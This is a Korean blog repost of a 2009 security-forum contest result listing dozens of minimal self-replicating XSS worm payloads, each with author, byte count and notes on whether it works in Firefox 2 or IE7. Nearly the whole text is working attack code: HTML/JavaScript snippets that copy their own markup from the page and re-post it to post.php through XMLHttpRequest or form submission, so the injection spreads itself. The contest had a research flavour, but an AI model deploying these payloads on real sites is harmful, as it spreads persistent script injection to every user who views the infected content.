어플리케이션/웹일반2009. 10. 11. 20:35

출 처 : http://blog.csdn.net/kj021320/archive/2009/10/10/4651888.aspx

참고 : http://winywan.com/index.php/web-develop/2008/07/17/59/

Posted by 김주일

아주 잘 명확하게 설명되어 있음.

시간이 나야 테스트를 해보곤 할껀데..ㅜㅜ


Posted by 김주일


써먹을 때가 있겠지.
Posted by 김주일

이전자료인데 스터디에서 나온  XSS 내용과 함께 하면 좋을 듯.

zxarp.zip 패스워드 걸려 있음
Posted by 김주일
출 처 : http://sla.ckers.org/forum/read.php?2,18790,page=19


<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

and

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

Both were a stunningly small 161 bytes! Congrats to both of the guys and a huge round of applause to everyone who submitted results. I was completely shocked by the results, as I thought we'd land at a much smaller number, but I think that was muddied by the fact that many people couldn't test their code in IE7.0.

And for those who want to see how the rest of the results panned out here are the judge results (feel free to contest them - it was a ton of work going through them so I _may_ have made errors):


spyware - 136 Doesn't work in Firefox 2.0.0.11
ý<form onFocus="submit(alert('xss'))"><input onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe onLoad="parentNode.focus()">ó


gareth - 162 Doesn't work in Firefox 2.0.0.11
<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">


digi7al64 (via gareth) - 144 Doesn't work in Firefox 2.0.0.11
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>


doctordan - 154 Doesn't work in Firefox 2.0.0.11
„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


ma1 - 165 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">


.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


Ronald - 147 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 149 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">


Gareth - 148 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;


Ronald - 198 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


Ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


sdc - 142 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>


ma1 - 201 Doesn't work in Firefox 2.0.0.11 on second iteration)
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"


gareth - 209 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


Ronald - 203 Works on FF and IE!!! (does change order around, but no growth):
<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Turns into (also 203 chars):
<B><IMG onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))" src=""></B>


ma1 - 132 Doesn't work in Firefox 2.0.0.11 as written
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"


ma1 - 140 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"


ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"


gareth - 188 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">


gareth - 209 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">


matt presson (via gareth) - 140 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">


gareth - 128 Missing payload
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">


digi7al64 - 140 Doesn't work in Firefox 2.0.0.11
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>


glacialphoenix (via digi7al64) - 226 Doesn't work in Firefox 2.0.0.11
<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>


doctordan - 133 Invalid as parens may exist elsewhere on the page
{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B


digi7al64 - 133 Doesn't work in Firefox 2.0.0.11
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>


digi7al64 - 134 IE only
<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>


digi7al64 - 111 IE only
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>


badsamaritan - 168 Works in FF but grows
<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>


gareth - 146 Works in FF but grows
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"


gareth - 153 Works in FF with no growth but doesn't work in IE7.0
<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">


ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


gareth - 204 Works in FF with no growth but doesn't work in IE7.0
_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>


ronald - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


gareth - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">


doctordan - 139 Invalid as parens may exist elsewhere on the page
{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9


doctordan (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">


gareth - 142 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">


doctordan (via ronald) - 130 Doesn't work in Firefox 2.0.0.11
<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b


doctordan (via ronald) - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


matt presson (via backstorm/ronald) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>


backstorm - 125 Doesn't work in Firefox 2.0.0.11
<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>


matt presson (via backstorm) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 131 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>



sdc - 154 (via ma1/.mario) Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


.mario (via ma1) - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"


ma1 - 155 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


.mario - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>


.mario - 134 Doesn't work in Firefox 2.0.0.11
<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>


ronald - 130 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald - 135 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>


ronald (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>


bwb labs - 251 - Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>


matt presson - 128 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>


gareth - 156 Doesn't work in Firefox 2.0.0.11
<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

ronald - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

spyware - 173 Doesn't work in Firefox 2.0.0.11
<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>


spyware - 157 Doesn't work in Firefox 2.0.0.11
<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>


spyware - 146 Doesn't work in Firefox 2.0.0.11
<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">


gareth - 206 Doesn't work in Firefox 2.0.0.11
<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>


ronald - 136 Breaks DOM knowledge rule
<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">


beni (via ronald) - 131 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>


ronald - 111 Doesn't work in Firefox 2.0.0.11 and grows
<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">


ronald - 174 Grows
<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">


gareth - 192 Uses the onload event handler which may already be assigned
<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"


mario (via beni) - 177 Works in FF but breaks in IE7.0 on second iteration
<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>


beni - 171 Works in FF but breaks in IE7.0 on second iteration
<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>


gareth - 175 Doesn't work in Firefox 2.0.0.11
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


gareth - 153 Breaks DOM knowledge rule
<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>


gareth - 147 Breaks DOM knowledge rule
<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"


gareth - 175 Breaks DOM knowledge rule
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


ronald - 185 Breaks DOM knowledge rule
<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


.mario (via ronald) - 161 Breaks DOM knowledge rule
<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (doctype check) - 165 Breaks DOM knowledge rule
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>


ronald (via kyran) - 185 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>

bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>


bwb labs - 255 Works in both FF and IE7.0!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


spikeman - 154 Grows
<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="


bwb labs (via dbloom) - 256 Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>


.mario - 158 Doesn't work in Firefox 2.0.0.11
<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>


.mario - 159 Works in FF with no growth but doesn't work in IE7.0
<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"


kyran - 183 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>


sdc - 154 - Grows in FF
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=


sdc - 154 - Grows in FF (same as above)
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=

ma1 (via gareth) - Works in FF but grows and stops working in IE7.0
<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">


gareth - 154 Posts to the wrong page
<form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">


gareth - 160 Posts to the wrong page
<form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>


dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>


ma1 - 157 Breaks DOM knowledge rule
<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


doctordan - 158 Doesn't work in Firefox 2.0.0.11
<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>


spyware - 141 Doesn't work in Firefox 2.0.0.11 if body content is present - so close!
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>


ma1 - 142 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>


ronald - 143 Doesn't work in Firefox 2.0.0.11
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


sdc (via ronald) 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined


sdc (via gareth) 169 Doesn't work in Firefox 2.0.0.11
<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">


gareth - 164 Posts to the wrong page
<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>


sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">


.mario - 132 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>


.mario - 141 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>


ronald - 132 Doesn't work in Firefox 2.0.0.11
<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>


spyware - 129 Doesn't work in Firefox 2.0.0.11
ý<FORM action=post.php method=post><INPUT onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();" name=content></FORM>


spyware - 135 Doesn't work in Firefox 2.0.0.11
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>


mario (via ronald) - 142 Doesn't work in Firefox 2.0.0.11
<form id=m><input name="content"><script>with(m)m[0].value='<form id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>


ronald - 141 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>


ronald - 145 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


ronald - 147 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content><script>_.content.value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>


spikeman (via .mario) - 132 Requires user interaction
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario - 140 Requires user interaction
<form id=j><button onclick="j.action=j.method='post';value='<form id=j>'+j.innerHTML+'</form>';alert('XSS')" name="content"></button></form>


.mario - 136 Requires user interaction
<form><button onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)" name="content">


.mario - 125 Requires user interaction
<form id=i><button onclick="i.method=i.action='post',value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>


.mario (via all) - 125 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">


.mario - 126 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">


.mario - 171 Works in FF with no growth and works in IE and actually shrinks!!!
<b><img onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()" src="m"><form id="i" action="post" method="post"><input name="content"></form></b>


bwb labs - 271 Works in both FF with no growth and IE!!!
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>


barbarianbob (via ma1) - 127 Requires user interaction
<form<input name="content" onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">


spyware - 140 Requires user interaction
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>


hallvors - 150 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">


hallvors - 185 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">


shawn (via ma1) - 128 Requires user interaction
<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">


bwb labs - 266 Works in FF with no growth and IE!!!
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>



spyware - 134 Requires user interaction
ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>


ma1 - 129 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">


ma1 - 136 Requires user interaction
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">


spyware - 134 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc (via shawn) - 143 Doesn't work in Firefox 2.0.0.11
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


spyware - 151 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>


sdc - 150 Requires user interaction
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>


spyware - 137 Requires user interaction
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>


sdc - 164 Doesn't work in Firefox 2.0.0.11
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>



sdc - 141 Doesn't work in Firefox 2.0.0.11
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>


spyware - 122 Requires user interaction
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>


shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>


amado - 140 Doesn't work in Firefox 2.0.0.11
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>


sdc - 155 Doesn't work in Firefox 2.0.0.11
<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>


ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>


ma1 - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">


dev80 - 159 Doesn't work in Firefox 2.0.0.11
<script>function p() {alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


sdc - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">


ma1 - 164 (works with opera and safari also) Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
